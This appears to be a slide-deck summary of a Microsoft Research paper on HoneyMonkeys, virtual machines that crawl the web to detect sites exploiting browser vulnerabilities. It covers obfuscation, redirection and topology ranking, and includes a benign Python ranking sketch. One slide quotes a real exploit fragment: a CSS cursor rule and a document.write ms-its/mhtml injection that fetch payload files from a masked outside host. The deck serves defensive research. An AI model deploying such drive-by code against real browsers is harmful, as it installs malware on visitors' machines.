Published by Selina Wheatley. Modified over 9 years ago.

Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities
AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang, Roussi Roussev, Chad Verbowski, Shuo Chen, and Sam King
PUBLISHED IN: MICROSOFT RESEARCH, Redmond

PROBLEM
- EMERGING ATTACK: INTERNET ATTACKS BY MALICIOUS WEBSITE
- EXPLOIT BROWSER VULNERABILITIES
- INSTALL MALICIOUS CONTENTS
PROPOSED
- USE OF HONEYMONKEYS FOR SOLUTION

BROWSER BASED VULNERABILITY
- Code obfuscation
- URL redirection
- Vulnerability exploitation
- Malware installation

CODE OBFUSCATION
- To escape from signature-based scanning
- Custom decoding routine included inside the script
- Unreadable long strings that are encoded and decoded later by the script or by the browser

ENCODED MALICIOUS CODE

DECODED MALICIOUS CODE

URL REDIRECTION
- PRIMARY URL TO SECONDARY URL
- PROTOCOL REDIRECTION USING HTTP 302 TEMPORARY REDIRECT
- HTML TAGS
- Script functions including window.location.replace()

URL REDIRECTION
[Diagram: USER, PRIMARY, SECONDARY; URLs shown: http://[IP address] /[8 chars]/test2/iejp.htm and http://[IP address]]

VULNERABILITY EXPLOITATION
- Malicious websites attempt to exploit multiple vulnerabilities
- HTML fragment: multiple files from different URLs
- Dynamic code injection using document.write
- Trojan downloader works after exploits
- Most attacked browser is IE

EXAMPLE FOR VULNERABILITY
* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}
Try{
document.write('<object data=`ms-its:mht 09l:file:// C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/ta rg'+'et.htm` type=`text/x-scriptlet`> ');
}catch(e){}
[Figure labels: Exploit 1, Exploit 2, Exploit 3]

Honey Monkey Exploit Detection System
- Active client-side virtual machines called honeypots
- Large-scale, systematic and automated web patrol
- It mimics human browsing
- Different patches and different levels of vulnerability

HONEYMONKEY SYSTEM
- Stage 1: scalable mode by visiting N URLs.
- Stage 2: perform recursive redirection analysis.
- Stage 3: scan exploit URLs using fully patched VMs.

HONEY MONKEY SYSTEM

TOPOLOGY GRAPH AND NODE RANKING
- Rectangular nodes represent exploit URLs
- Arrows represent traffic redirection
- Circles represent nodes that act as an aggregation point for exploit pages hosted
- R is the most likely exploit provider

TOPOLOGY GRAPH AND NODE RANKING
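
As an added illustration (not code from the slides or from the HoneyMonkey project), the sketch below builds a site-level topology graph from redirection pairs and ranks sites by how many distinct sites redirect traffic to them. The sample URLs are constructed placeholders, and ranking by incoming redirections is an assumption; the slides state only that arrows are traffic redirections and that the top node is the most likely exploit provider.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: (from_url, to_url) redirections observed while a
# monitored VM visited known exploit URLs. All hosts are placeholders.
REDIRECTS = [
    ("http://site-a.example/index.htm", "http://agg-r.example/in.php"),
    ("http://site-b.example/pics.htm", "http://agg-r.example/in.php"),
    ("http://site-c.example/free.htm", "http://agg-r.example/x/load.htm"),
    ("http://site-c.example/free.htm", "http://agg-s.example/go.htm"),
    ("http://site-d.example/a.htm", "http://agg-s.example/go.htm"),
    ("http://agg-s.example/go.htm", "http://agg-r.example/in.php"),
    ("http://site-a.example/index.htm", "http://site-a.example/frame.htm"),
]


def site_of(url):
    """Collapse a URL to its host, the node granularity assumed here."""
    return urlsplit(url).hostname


def build_topology(redirects):
    """Return {site: set of other sites that redirect traffic to it}."""
    incoming = defaultdict(set)
    for src, dst in redirects:
        s, d = site_of(src), site_of(dst)
        incoming[s]  # register pure sources as nodes too
        if s != d:   # same-site hops are not cross-site traffic
            incoming[d].add(s)
    return incoming


def rank_sites(redirects):
    """Rank sites by distinct incoming redirectors (assumed criterion)."""
    incoming = build_topology(redirects)
    ranked = [(site, len(srcs)) for site, srcs in incoming.items()]
    # Highest fan-in first; ties broken alphabetically for stable output.
    return sorted(ranked, key=lambda item: (-item[1], item[0]))


if __name__ == "__main__":
    for site, fan_in in rank_sites(REDIRECTS):
        print(f"{fan_in:2d} incoming  {site}")
```

Sites at the top of the ranking are the aggregation points worth prioritizing for blocking or takedown, since many front-end exploit pages depend on them.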

GENERATING URL LISTS
- Suspicious URLs
- Popular websites: if attacked, potentially attack larger population
- Localized space websites

Exploit Detection Report
- Executable files created or modified outside the browser sandbox folders
- Processes created
- Windows registry entry created or modified
- Vulnerability exploited
- Redirect URL visited

Patch level statistics

RESULTS

ADVANTAGES
- Automatic
- Scalable
- Non-signature-based approach
- Stage-wise detection

DISADVANTAGES
- Exploiters may randomize the attack, confusing the honey monkeys
- Exploiters were able to detect honey monkeys by sending a dialog box
- They didn't explain topology graphs very clearly

IMPROVEMENTS
- They need to work on accuracy
- They need more classification according to contents
- They should improve on avoiding detection by the honey monkeys